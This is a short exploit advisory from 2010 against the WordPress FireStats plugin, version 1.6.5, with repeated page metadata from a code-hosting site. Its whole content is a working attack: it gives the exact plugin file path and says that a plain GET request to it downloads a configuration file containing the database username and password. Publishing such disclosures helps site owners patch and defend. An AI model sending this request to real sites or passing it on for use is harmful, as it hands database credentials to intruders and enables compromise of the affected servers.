13 lines
No EOL
460 B
Text
13 lines
No EOL
460 B
Text
# Exploit Title: Wordpress firestats remote configuration file download
|
|
|
|
# Date: 2010-07-09
|
|
# Author: Jelmer de Hen
|
|
# Software Link: http://firestats.cc/
|
|
# Version: 1.6.5
|
|
# Tested on: PHP Do a simple GET request to this file:
|
|
|
|
/wp-content/plugins/firestats/php/tools/get_config.php
|
|
|
|
This will allow you to download a configuration file which contains the database username and password.
|
|
|
|
http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html |